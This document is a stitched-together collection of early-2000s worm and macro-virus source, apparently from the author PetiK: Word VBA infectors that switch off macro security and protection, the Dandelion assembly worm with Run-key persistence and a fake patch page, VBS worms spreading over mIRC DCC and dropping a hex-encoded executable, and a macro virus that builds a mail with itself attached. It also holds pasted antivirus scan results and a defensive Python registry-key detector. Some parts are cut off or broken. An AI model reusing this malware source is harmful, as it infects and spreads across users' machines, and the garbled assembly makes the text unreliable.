Open "c:\v.r" For Output As #2
Print #2, "REGEDIT4"
Print #2, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]"
Print #2, """Level""=dword:00000001"
Print #2, "[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]"
Print #2, """Level""=dword:00000001"
Print #2, """AccessVBOM""=dword:00000001"
Close #2
Shell "c:\regedit.exe /s c:\v.r", vbHide
Kill "c:\v.r"
Open "c:\nl.tmp" For Output As #9
Print #9, "Sub document_close()"
Print #9, "On Error Resume Next"
Print #9, "Open ""c:\xp.exp"" For Output As 2"
Print #9, "Print #2, ""sub document_open()"""
Print #9, "Print #2, ""On Error Resume Next"""
Print #9, "Print #2, ""jbo = ActiveDocument.Shapes(1).OLEFormat.ClassType"""
Print #9, "Print #2, ""With ActiveDocument.Shapes(1).OLEFormat"""
Print #9, "Print #2, "" .ActivateAs ClassType:=jbo"""
Print #9, "Print #2, "" .Activate"""
Print #9, "Print #2, ""End With"""
Print #9, "Print #2, ""end sub"""
Print #9, "Close 2"
Print #9, "Set fso = CreateObject(""Scripting.FileSystemObject"")"
Print #9, "Set nt = ActiveDocument.VBProject.vbcomponents(1).codemodule"
Print #9, "Set iw = fso.OpenTextFile(""c:\xp.exp"", 1, True)"
Print #9, "nt.DeleteLines 1, nt.CountOfLines"
Print #9, "i = 1"
Print #9, "Do While iw.atendofstream <> True"
Print #9, "b = iw.readline"
Print #9, "nt.InsertLines i, b"
Print #9, "i = i + 1"
Print #9, "Loop"
Print #9, "ActiveDocument.Shapes.AddOLEObject _"
Print #9, "FileName:=""c:\XXXview.exe"", _"
Print #9, "LinkToFile:=False"
Print #9, "ActiveDocument.Save"
Print #9, "Open ""c:\b8.r"" For Output As #3"
Print #9, "Print #3, ""REGEDIT4"""
Print #9, "Print #3, ""[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]"""
Print #9, "Print #3, """"""Level""""=dword:00000001"""
Print #9, "Print #3,
""[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]"""
Print #9, "Print #3, """"""Level""""=dword:00000001"""
Print #9, "Print #3, """"""AccessVBOM""""=dword:00000001"""
Print #9, "Close #3"
Print #9, "Shell ""c:\regedit.exe /s c:\b8.r"", vbHide"
Print #9, "Kill ""c:\b8.r"""
Print #9, "End Sub"
Close #9
Open GetSpecialfolder(CSIDL_STARTUP) & "\startup.vbs" For Output As #6
Print #6, "On Error Resume Next"
Print #6, "Set fso = CreateObject(""Scripting.FileSystemObject"")"
Print #6, "Set oword = CreateObject(""Word.Application"")"
Print #6, "oword.Visible = False"
Print #6, "Set nt = oword.NormalTemplate.vbproject.vbcomponents(1).codemodule"
Print #6, "Set iw = fso.OpenTextFile(""c:\nl.tmp"", 1, True)"
Print #6, "nt.DeleteLines 1, nt.CountOfLines"
Print #6, "i = 1"
Print #6, "Do While iw.atendofstream <> True"
Print #6, "b = iw.readline"
Print #6, "nt.InsertLines i, b"
Print #6, "i = i + 1"
Print #6, "Loop"
Print #6, "oword.NormalTemplate.Save"
Print #6, "oword.NormalTemplate.Close"
Print #6, "oword.quit"
Close #6
End Sub
File Brigada.exe received on 05.16.2009 11:20:53 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Alcaul!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win32/CrazyBox.worm.75264
AntiVir 7.9.0.168 2009.05.15 Worm/Alcaul.T1
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Alcaul
Authentium 5.1.2.4 2009.05.15 W32/Malware!7ad5
Avast 4.8.1335.0 2009.05.15 Win32:Alcaul-AG
AVG 8.5.0.336 2009.05.15 Win32/Alcarys
BitDefender 7.2 2009.05.16 Win32.Alcaul.TB@mm
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Alcaul.t
ClamAV 0.94.1 2009.05.15 Worm.Petik-3
Comodo 1157 2009.05.08 Worm.Win32.Petal.A
DrWeb 5.0.0.12182 2009.05.16 Win32.HLLM.Generic.64
eTrust-Vet 31.6.6508 2009.05.16 Win32/Alcaul
F-Prot 4.4.4.56 2009.05.15 W32/Malware!7ad5
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Alcaul.t
Fortinet 3.117.0.0 2009.05.16 W32/Alcaul.T!worm
GData 19 2009.05.16 Win32.Alcaul.TB@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Alcaul
K7AntiVirus 7.10.735 2009.05.14 Email-Worm.Win32.Alcaul.t
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Alcaul.t
McAfee 5616 2009.05.15 W32/Alcop.ai@MM
McAfee+Artemis 5616 2009.05.15 W32/Alcop.ai@MM
Microsoft 1.4602 2009.05.16 Worm:Win32/Alcolita.A@mm
NOD32 4080 2009.05.15 Win32/Petal.A
Norman 6.01.05 2009.05.16 Alcaul.AZ@mm
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Alcaul.75264
Panda 10.0.0.14 2009.05.15 Worm Generic.LC
PCTools 4.4.2.0 2009.05.15 Worm.Alcaul
Prevx 3.0 2009.05.16 High Risk Cloaked Malware
Rising 21.29.52.00 2009.05.16 Worm.Mail.Alcaul.bl
Sophos 4.41.0 2009.05.16 W32/Alcaul-V
Sunbelt 3.2.1858.2 2009.05.16 W32.Alcaul.Worm
Symantec 1.4.4.12 2009.05.16 W32.Alcaul.Worm
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 WORM_CRAZYBOX.A
VBA32 3.12.10.5 2009.05.16 Win32.HLLW.Alcaul.t
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Alcop.CD

Additional information
File size: 75264 bytes
MD5...: 0a8cdb77f334f3f5d542509ed70ace70
SHA1..: 95e493da53b720985007df8f28817b94b7d9a902
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.Dandelion
Author : PetiK
Date : November 7th
Size : 6144 bytes

Action: Copies itself to

* WINDOWS\SYSTEM\Explor.exe

Adds under the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value

* MS Explor = WINDOWS\SYSTEM\Explor.exe

On each run, it copies itself under a random name into the %windows% path and records
that name in the file "dandelion.txt" in the same folder.

To delete the worm :

Look at the file Del_Dandelion.vbs

To build the worm :

@echo off
tasm32 /ml /m9 Dandelion
tlink32 -Tpe -c -x -aa Dandelion,,,import32,dllz.def
upx -9 Dandelion.exe
if exist *.obj del *.obj
if exist *.map del *.map
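As an added defender-side example (not code from the page), the Python below parses a REGEDIT4 export of the kind the Brigada wording() routine feeds to regedit /s and flags the autostart values the worms above write (RunServices\b8 for Brigada, Run\MS Explor for Dandelion) together with the Word macro-security downgrade (Level=1, AccessVBOM=1). The sample export and its file paths are constructed.

```python
import re

# Keys whose values start programs at logon/boot (page: Run\LVSH, Run\MS Explor, RunServices\b8).
AUTOSTART_KEY_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce|RunServices)$", re.IGNORECASE)
# Word macro-security key the page's wording() routine rewrites via regedit /s.
WORD_SECURITY_KEY_RE = re.compile(r"\\Office\\\d+\.\d+\\Word\\Security$", re.IGNORECASE)
# "name"=data or @=data (default value)
VALUE_LINE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')


def _unescape(s: str) -> str:
    """REGEDIT4 escapes backslash and quote inside strings with a backslash."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_regedit4(text: str) -> dict:
    """Parse a REGEDIT4 export into {key: {value_name: data}}.

    Strings become str, dword:xxxxxxxx becomes int; other data types are kept raw.
    """
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.upper() == "REGEDIT4" or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = VALUE_LINE_RE.match(line)
        if current is None or not m:
            continue  # lines this small parser does not model (hex:, multi-line values)
        name = "@" if m.group(1) is None else _unescape(m.group(1))
        data = m.group(2).strip()
        if data.lower().startswith("dword:"):
            data = int(data[6:], 16)
        elif len(data) >= 2 and data[0] == data[-1] == '"':
            data = _unescape(data[1:-1])
        keys[current][name] = data
    return keys


def find_findings(keys: dict) -> list:
    """Flag autostart entries and Word macro-security downgrades.

    Level=1 is the Low setting (no macro warning); AccessVBOM=1 lets macros edit VBA projects,
    which the page's document-infection routine needs.
    """
    findings = []
    for key, values in keys.items():
        if AUTOSTART_KEY_RE.search(key):
            for name, data in values.items():
                findings.append(("autostart", key, name, data))
        elif WORD_SECURITY_KEY_RE.search(key):
            if values.get("Level") == 1:
                findings.append(("macro-security-low", key, "Level", 1))
            if values.get("AccessVBOM") == 1:
                findings.append(("vba-project-access", key, "AccessVBOM", 1))
    return findings


# Constructed sample: the page's wording() REGEDIT4 fragment plus the autostart values the
# Brigada (RunServices\b8) and Dandelion (Run\MS Explor) worms write; paths are placeholders.
SAMPLE_REG = r"""REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MS Explor"="C:\\WINDOWS\\SYSTEM\\Explor.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
"b8"="C:\\WINDOWS\\SYSTEM\\Ms0701i32.exe -petikb8"

[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]
"Level"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]
"Level"=dword:00000001
"AccessVBOM"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Options]
"SomeOption"=dword:00000000
"""

if __name__ == "__main__":
    for finding in find_findings(parse_regedit4(SAMPLE_REG)):
        print(finding)
```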

Notes of the authors:

#
.586p
.model flat
.code

JUMPS
api macro a
extrn a:proc
call a
endm

include useful.inc
include myinclude.inc

start:

twin_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA ; esi = name of file

mov edi,offset copy_worm


push edi
push 50
push edi
api GetSystemDirectoryA
add edi,eax
mov eax,"pxE\"
stosd
mov eax,".rol"
stosd
mov eax,"exe"
stosd
pop edi ; edi =

push 0
push edi
push esi
api CopyFileA ; copy itself
push 9
push edi
push 1
@pushsz "MS Explor"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA ; regedit
end_twin:

; call spread_computer
call htm_file

end_worm:
push 0
api ExitProcess

spread_computer proc
pushad
call generator_name
mov edi,offset genname

push 50
push offset windir
api GetWindowsDirectoryA
push offset windir
api SetCurrentDirectoryA

push 0
push edi
push offset orig_worm
api CopyFileA
@pushsz "dandelion.txt"
@pushsz "A New Copy Of Worm.Dandelion"
push edi
@pushsz "Copy Of Worm"
api WritePrivateProfileStringA

end_spread_computer:
popad
ret

generator_name:
mov edi,offset genname
api GetTickCount
push 9
pop ecx
xor edx,edx
div ecx
inc edx
mov ecx,edx
gen_name:
push ecx
api GetTickCount
push 'Z'-'A'
pop ecx
xor edx,edx
div ecx
xchg eax,edx
add al,'A'
stosb
api GetTickCount
push 100
pop ecx
xor edx,edx
div ecx
push edx
api Sleep
pop ecx
loop gen_name
mov eax,'exe.'
stosd
ret
spread_computer endp

htm_file proc
pushad
mov edi,offset ptkdir
push edi
push 50
push edi
api GetSystemDirectoryA
add edi,eax
mov eax,"glP\"
stosd
mov eax,"KTP_"
stosd
pop edi
push edi
api CreateDirectoryA
push edi
api SetCurrentDirectoryA
create_htm:
@pushsz "\WinPatch.htm"
push offset ptkdir
api lstrcat
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push offset ptkdir
api CreateFileA
mov [hHTM],eax
push 0
push offset byte
push e_htm - s_htm
push offset s_htm
push [hHTM]
api WriteFile
push [hHTM]
api CloseHandle
end_htm_file:
popad
ret
htm_file endp

.data
; === copy_worm ===
orig_worm db 50 dup (0)
copy_worm db 50 dup (0)

; === spread_computer ===


windir db 50 dup (0)
genname db 15 dup (?)

; === htm_file ===


ptkdir db 50 dup (0)
hHTM dd ?
byte dd ?
s_htm: db '<HTML><HEAD><TITLE>Windows98</TITLE></HEAD>',CRLF
db '<BODY TEXT=yellow LINK=red VLINK=red BGCOLOR="#000080">',CRLF
db '<P ALIGN="RIGHT">',CRLF
db '<A HREF="http://www.microsoft.com/isapi/redir.dll?'
db 'prd=windows98&clcid=&pver=4.10&ar=wallpaper">',CRLF
db '<IMG SRC="res://membg.dll/membg.gif" BORDER=0 WIDTH=329 HEIGHT=47></A>&nbsp;'
db '</P>',CRLF
db '</BODY>',CRLF
db '<P ALIGN="CENTER">',CRLF
db '<script language=vbscript>',CRLF
db 'on error resume next',CRLF
db 'set fso=createobject("scripting.filesystemobject")',CRLF
db 'if err.number=429 then',CRLF
db 'document.write "<font>Please accept the ActiveX to see this HTML wallpaper !'
db '<br><a href =''javascript:location.reload()''>CLICK HERE</a> to reload and '
db 'click yes</font>"',CRLF
db 'else',CRLF
db 'document.write "<font>Click on the Windows logo to download the new patch.'
db '<br>This patch correct the bug about the IIS and MIME.<br><br></font>"',CRLF
db 'document.write "<font>(You must be connected tp inet !!)</font>"',CRLF
db 'end if',CRLF
db '</script>',CRLF
db '</HTML>',CRLF
e_htm:
signature db "I-Worm.Dandelion "
author db "Coded by PetiK - 2001",00h

end start
end
'VBS.GoodBye Written in France.
'My last Worm. I say Good Bye
On Error Resume Next
dim w,f,win,sys,file
Set w=CreateObject("WScript.Shell")
Set fso=CreateObject("Scripting.FileSystemObject")
Set win=fso.GetSpecialFolder(0)
Set sys=fso.GetSpecialFolder(1)
Set tmp=fso.GetSpecialFolder(2)

Set wo=fso.GetFile(WScript.ScriptFullName)
If wo <> (sys&"\Cmmon32.vbs") Then
MsgBox "Look at this new Game",vbinformation,"New Game For You"
img="4D5A50000200000004000F00FFFF0000.."
lire=decr(img)
Set pic=fso.CreateTextFile(win&"\New_Prog.exe",true)
pic.Write lire
pic.Close
'w.Run win&"\New_Prog.exe",1,false
MsgBox "Script : "&wo&vbCrLf&"Error : Cannot read this script"&vbCrLf&"Code :
800A000D",vbcritical,"Windows Script Host"
End If

If not fso.FolderExists(sys&"\Plg_PTK") Then


fso.CreateFolder(sys&"\Plg_PTK")
End If
x=0
do while x<100
a=x
extension
wo.Copy(sys&"\Plg_PTK\Save"&a&crext)
x=x+1
loop

wo.Copy(sys&"\Cmmon32.vbs")
wo.Copy(sys&"\Plg_PTK\Important.vbs")
run=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS Cmmon32")
w.RegWrite run,("wscript "&sys&"\Cmmon32.vbs")

If Day(Now)=11 and Month(Now)=9 Then


w.RegDelete ("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS Cmmon32")
End If

cache=w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders\Cache")
desktop=w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders\Desktop")
personal=w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders\Personal")
progfile=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
commonfile=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\CommonFilesDir")

Mail(win)
Mail(sys)
Mail(tmp)
Mail(cache)
Mail(desktop)
Mail(personal)
Mail(progfile)
Mail(commonfile)

WormM ""

Function extension
text="ComExeBatDocXlsPptTifBmpJpgGifHtmHttMp3WavMid"
randomize (timer)
tfile=int(rnd(1)*14)+1
crext="."& mid(text,((tfile-1)*3)+1,3)
crext=crext&".vbs"
End Function

Function decr(octet)
For hexa=1 To Len(octet) Step 2
decr=decr & Chr("&h" & Mid(octet, hexa, 2))
Next
End Function

Function WormM(dir)
If Dir = "" Then
If fso.FileExists("C:\mirc\mirc.ini") then dir="C:\mirc
If fso.FileExists("C:\mirc32\mirc.ini") then dir="C:\mirc32
If fso.FileExists(pogfile&"\mirc\mirc.ini") then dir=pogfile&"\mirc\mirc.ini"
If fso.FileExists(pogfile&"\mirc32\mirc.ini") then dir=pogfile&"\mirc32\mirc.ini"
End If
If dir <> "" Then
Set mirc=fso.CreateTextFile(dir&"\script.ini", True)
mirc.WriteLine "[scipt]"
mirc.WriteLine "n0=ON 1:JOIN:#:{ ( $nick == $me ) { halt }"
mirc.WriteLine "n1 = /dcc send $nick " &sys&"\Plg_PTK\Important.vbs"
mirc.WriteLine "n2=}"
mirc.Close
End If
End Function

Function Mail(dossier)
If not fso.FileExists(sys&"\Plg_PTK\Info.txt") Then
Set DF=fso.CreateTextFile(sys&"\Plg_PTK\Info.txt")
DF.WriteLine "Files Found By VBS.GoodBye.Worm :"
DF.WriteBlankLines(1)
DF.Close
End If
If fso.FolderExists(dossier) Then
For Each File in fso.GetFolder(dossier).Files
ext=fso.GetExtensionName(File.Name)
If (ext="htm") or (ext="html") or (ext="php") or (ext="htt") Then
Set see = fso.OpenTextFile(File.path, 1)
liretout = see.ReadAll

For i = 1 to len(liretout)
mailto = mid(liretout,i,7)
If mailto = "mailto:" Then
msgbox mailto,vbinformation,File.path
Exit For
else
End If
Next
see.Close
Set DF = fso.OpenTextFile(sys&"\Plg_PTK\Info.txt", 8, True)
DF.WriteLine date& " " &time& " => " &File.path
DF.Close
End If
Next
End If
End Function

INFO.TXT

Files Found By VBS.GoodBye.Worm :

30.11.01 18:56:19 => C:\WINDOWS\TEMP\RND130.htm
30.11.01 18:56:34 => C:\Eigene Dateien\INC Fichier.doc
30.11.01 18:56:34 => C:\Eigene Dateien\INTERNETAPI.doc
30.11.01 18:56:37 => C:\Eigene Dateien\VBSStarmania.doc
30.11.01 18:56:38 => C:\Eigene Dateien\SevenSource.doc
30.11.01 18:56:38 => C:\Eigene Dateien\WinHelp.htm
30.11.01 18:56:40 => C:\Eigene Dateien\hrecmd.html
30.11.01 18:56:40 => C:\Eigene Dateien\hobby.html
30.11.01 18:56:40 => C:\Eigene Dateien\hhobby.html
30.11.01 18:56:40 => C:\Eigene Dateien\htalent.html
30.11.01 18:56:44 => C:\Eigene Dateien\INCFile.doc
30.11.01 19:04:58 => C:\WINDOWS\WinHelp.htm
30.11.01 19:04:58 => C:\WINDOWS\hrecmd.html
30.11.01 19:04:58 => C:\WINDOWS\hobby.html
30.11.01 19:04:58 => C:\WINDOWS\hhobby.html
30.11.01 19:04:58 => C:\WINDOWS\htalent.html
30.11.01 19:05:02 => C:\WINDOWS\TEMP\RND130.htm
30.11.01 19:05:18 => C:\Eigene Dateien\INC Fichier.doc
30.11.01 19:05:18 => C:\Eigene Dateien\INTERNETAPI.doc
30.11.01 19:05:21 => C:\Eigene Dateien\VBSStarmania.doc
30.11.01 19:05:22 => C:\Eigene Dateien\SevenSource.doc
30.11.01 19:05:22 => C:\Eigene Dateien\WinHelp.htm
30.11.01 19:05:23 => C:\Eigene Dateien\hrecmd.html
30.11.01 19:05:23 => C:\Eigene Dateien\hobby.html
30.11.01 19:05:23 => C:\Eigene Dateien\hhobby.html
30.11.01 19:05:23 => C:\Eigene Dateien\htalent.html
30.11.01 19:05:27 => C:\Eigene Dateien\INCFile.doc
30.11.01 19:07:13 => C:\WINDOWS\WinHelp.htm
30.11.01 19:07:14 => C:\WINDOWS\hrecmd.html
30.11.01 19:07:14 => C:\WINDOWS\hobby.html
30.11.01 19:07:14 => C:\WINDOWS\hhobby.html
30.11.01 19:07:14 => C:\WINDOWS\htalent.html
30.11.01 19:07:19 => C:\WINDOWS\TEMP\RND130.htm
30.11.01 19:07:44 => C:\Eigene Dateien\INC Fichier.doc
30.11.01 19:07:44 => C:\Eigene Dateien\INTERNETAPI.doc
30.11.01 19:07:45 => C:\Eigene Dateien\SevenSource.doc
30.11.01 19:07:45 => C:\Eigene Dateien\WinHelp.htm
30.11.01 19:07:46 => C:\Eigene Dateien\hrecmd.html
30.11.01 19:07:46 => C:\Eigene Dateien\hobby.html
30.11.01 19:07:46 => C:\Eigene Dateien\hhobby.html
30.11.01 19:07:46 => C:\Eigene Dateien\htalent.html
30.11.01 19:07:50 => C:\Eigene Dateien\INCFile.doc
30.11.01 19:09:04 => C:\WINDOWS\WinHelp.htm
30.11.01 19:09:05 => C:\WINDOWS\hrecmd.html
30.11.01 19:09:05 => C:\WINDOWS\hobby.html
30.11.01 19:09:05 => C:\WINDOWS\hhobby.html
30.11.01 19:09:05 => C:\WINDOWS\htalent.html
30.11.01 19:09:09 => C:\WINDOWS\TEMP\RND130.htm
30.11.01 19:09:26 => C:\Eigene Dateien\INC Fichier.doc
30.11.01 19:09:26 => C:\Eigene Dateien\INTERNETAPI.doc
30.11.01 19:09:27 => C:\Eigene Dateien\SevenSource.doc
30.11.01 19:09:27 => C:\Eigene Dateien\WinHelp.htm
30.11.01 19:09:27 => C:\Eigene Dateien\hrecmd.html
30.11.01 19:09:27 => C:\Eigene Dateien\hobby.html
30.11.01 19:09:27 => C:\Eigene Dateien\hhobby.html
30.11.01 19:09:27 => C:\Eigene Dateien\htalent.html
30.11.01 19:09:31 => C:\Eigene Dateien\INCFile.doc
30.11.01 19:15:20 => C:\WINDOWS\WinHelp.htm
30.11.01 19:15:21 => C:\WINDOWS\hrecmd.html
30.11.01 19:15:21 => C:\WINDOWS\hobby.html
30.11.01 19:15:21 => C:\WINDOWS\hhobby.html
30.11.01 19:15:21 => C:\WINDOWS\htalent.html
30.11.01 19:15:25 => C:\WINDOWS\TEMP\RND130.htm
30.11.01 19:15:39 => C:\Eigene Dateien\INC Fichier.doc
30.11.01 19:15:40 => C:\Eigene Dateien\INTERNETAPI.doc
30.11.01 19:15:40 => C:\Eigene Dateien\SevenSource.doc
30.11.01 19:15:40 => C:\Eigene Dateien\WinHelp.htm
30.11.01 19:15:40 => C:\Eigene Dateien\hrecmd.html
30.11.01 19:15:40 => C:\Eigene Dateien\hobby.html
30.11.01 19:15:40 => C:\Eigene Dateien\hhobby.html
30.11.01 19:15:40 => C:\Eigene Dateien\htalent.html
30.11.01 19:15:44 => C:\Eigene Dateien\INCFile.doc
30.11.01 19:16:09 => C:\WINDOWS\WinHelp.htm
30.11.01 19:16:10 => C:\WINDOWS\hrecmd.html
30.11.01 19:16:10 => C:\WINDOWS\hobby.html
30.11.01 19:16:10 => C:\WINDOWS\hhobby.html
30.11.01 19:16:10 => C:\WINDOWS\htalent.html
30.11.01 19:16:15 => C:\WINDOWS\TEMP\RND130.htm
30.11.01 19:16:30 => C:\Eigene Dateien\INC Fichier.doc
30.11.01 19:16:31 => C:\Eigene Dateien\INTERNETAPI.doc
30.11.01 19:16:31 => C:\Eigene Dateien\SevenSource.doc
30.11.01 19:16:31 => C:\Eigene Dateien\WinHelp.htm
30.11.01 19:16:31 => C:\Eigene Dateien\hrecmd.html
30.11.01 19:16:32 => C:\Eigene Dateien\hobby.html
30.11.01 19:16:32 => C:\Eigene Dateien\hhobby.html
30.11.01 19:16:32 => C:\Eigene Dateien\htalent.html
30.11.01 19:16:35 => C:\Eigene Dateien\INCFile.doc
'VBS.Cachemire
'On error resume next

fs="FileSystemObject"
sc="Scripting"
wsc="WScript"
sh="Shell"
crlf=Chr(13)&Chr(10)
Set fso=CreateObject(sc & "." & fs)
Set ws=CreateObject(wsc & "." & sh)
Set win=fso.GetSpecialFolder(0)
Set sys=fso.GetSpecialFolder(1)
Set tmp=fso.GetSpecialFolder(2)
desk=ws.SpecialFolders("Desktop")
strp=ws.SpecialFolders("StartUp")

Set fl=fso.OpenTextFile(WScript.ScriptFullName,1)
wrm=fl.ReadAll
fl.Close

If WScript.ScriptFullName <> sys&"\MsBackup.vbs" Then
MsgBox "Sorry but the file """ & WScript.ScriptName & """ is not a valid VBS file",vbcritical,"ALERT"
'fso.GetFile(WScript.ScriptFullName).Copy(sys&"\MsBackup.vbs")
'ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MsBackup",sys&"\MsBackup.vbs"
Else

End If
comment $
Name : I-Worm.Lauli
Author : PetiK
Date : 7th June 2002 -

.586p
.model flat
.code

JUMPS

api macro a
extrn a:proc
call a
endm

include useful.inc

st_worm:push 50
mov esi,offset org_wrm
push esi
push 0
api GetModuleFileNameA

mov edi,offset cpy_wrm


push edi
push 50
push edi
api GetSystemDirectoryA
add edi,eax
mov eax,"WsM\"
stosd
mov eax,"kcos"
stosd
mov eax,"exe."
stosd
pop edi

;cop: push 0
; push edi
; push esi
; api CopyFileA

;reg: push 50
; push edi
; push 1
; @pushsz "Wsock32"
; @pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
; push 80000002h
; api SHSetValueA

push 0
push 80h
push 3
push 0
push 1
push 80000000h
@pushsz "code.txt" ;push offset org_wrm
inc eax
je end_cr_vbs
dec eax
xchg eax,ebx

xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
api CreateFileMappingA
test eax,eax
je end_vbs1
xchg eax,ebp

push 40h
@pushsz "OK"
@pushsz "OK"
push 0
api MessageBoxA

xor eax,eax
push eax
push eax
push eax
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_vbs2

push 0
push ebx
api GetFileSize
mov [size],eax

chk_byte:
mov edi,offset hex
push edi
p_c: lodsb
call convert
stosb
dec size
cmp size,0
jnz p_c
pop edi

push 40h
@pushsz "Hex String:"
push edi
push 0
api MessageBoxA
end_vbs3:
push esi
api UnmapViewOfFile
end_vbs2:
push ebp
api CloseHandle
end_vbs1:
push ebx
api CloseHandle
end_cr_vbs:

end_worm:
push 0
api ExitProcess
convert:
push ecx
push edi
xor ecx,ecx
mov cl,al
push ecx
shr cl,4
lea edi,hex_table
inc cl
@@y:
inc edi
dec cl
jnz @@y
dec edi
mov al, byte ptr [edi]
pop ecx
and cl,0Fh
lea edi,hex_table
inc cl
@@x:
inc edi
dec cl
jnz @@x
dec edi
mov ah,byte ptr [edi]
pop edi
pop ecx
ret

.data
cpy_wrm db 50 dup (0)
org_wrm db 50 dup (0)

size dd ?
hex_table db "0123456789ABCDEF",0 ; one entry per nibble value, "6" was missing

hex db 5000 dup (?)

end st_worm
end
Private Declare Function GetUserName Lib "advapi32.dll" Alias "GetUserNameA" _
(ByVal lpBuffer As String, nSize As Long) As Long

Sub AutoOpen()

Call FuckProtection
Call InfectWord

Call CreateEML

End Sub

Sub InfectWord()
On Error Resume Next
Set nor = NormalTemplate.VBProject.VBComponents
Set doc = ActiveDocument.VBProject.VBComponents
srcvir = "C:\calli.drv"
If nor.Item("Calli").Name <> "Calli" Then
doc("Calli").Export srcvir
nor.Import srcvir
End If
If doc.Item("Calli").Name <> "Calli" Then
nor("Calli").Export srcvir
doc.Import srcvir
ActiveDocument.Save
End If
Kill (srcvir)
End Sub

Sub FuckProtection()
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
Select Case Application.Version
Case "10.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
Case "9.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End Select
WordBasic.DisableAutoMacros 0
End Sub

Sub CreateEML()

Dim strUserName As String


strUserName = String(100, Chr$(0))
GetUserName strUserName, 100
strUserName = Left$(strUserName, InStr(strUserName, Chr$(0)) - 1)

bound = ""
For i = 1 To 17
Randomize (Timer)
bound = bound + Chr(Int(Rnd(1) * 8) + 48)
Next

eml1 = "To: """ & strUserName & "@microsoft.com""" & vbCrLf & _
"Subject: Hello You..." & vbCrLf & _
"Date: " & Hour(Now) & ":" & Minute(Now) & ":" & Second(Now) & " +0200" & vbCrLf & _
"MIME-Version: 1.0" & vbCrLf & _
"Content-Type: multipart/mixed;" & vbCrLf & _
vbTab & "boundary = ""----=_NextPart_" & bound & """" & vbCrLf & _
"X-Priority: 3" & vbCrLf & _
"X-MSMail-Priority: Normal" & vbCrLf & _
"X-Unsent: 1" & vbCrLf & _
"X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000" & vbCrLf & vbCrLf & _
"This is a multi-part message in MIME format." & vbCrLf & vbCrLf

eml2 = "------=_NextPart_" & bound & vbCrLf & _
"Content-Type: text/plain;" & vbCrLf & _
vbTab & "Charset=""iso-8859-1""" & vbCrLf & _
"Content-Transfer-Encoding: 7bit" & vbCrLf & vbCrLf & _
"Hello my friend, this is a funny file for you" & vbCrLf & vbCrLf & _
vbTab & vbTab & "Best Regards" & vbCrLf & vbCrLf & vbCrLf

eml3 = "------=_NextPart_" & bound & vbCrLf & _
"Content-Type: application/x-msdownload;" & vbCrLf & _
vbTab & "name = ""Only_For_You.doc""" & vbCrLf & _
"Content-Transfer-Encoding: base64" & vbCrLf & _
"Content-Disposition: attachment;" & vbCrLf & _
vbTab & "fileName = ""Only_For_You.doc""" & vbCrLf & vbCrLf

eml4 = EncodeBase64(ActiveDocument.FullName)

eml5 = vbCrLf & "------=_NextPart_" & bound

Open "hello.eml" For Output As #1


Print #1, eml1 & eml2 & eml3 & eml4 & eml5
Close #1

End Sub
Private Function EncodeBase64(ByVal vsFullPathname As String) As String
On Error Resume Next
Dim b As Integer
Dim Base64Tab As Variant
Dim bin(3) As Byte
Dim s As String
Dim l As Long
Dim i As Long
Dim FileIn As Long
Dim sResult As String
Dim n As Long
Base64Tab = Array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", _
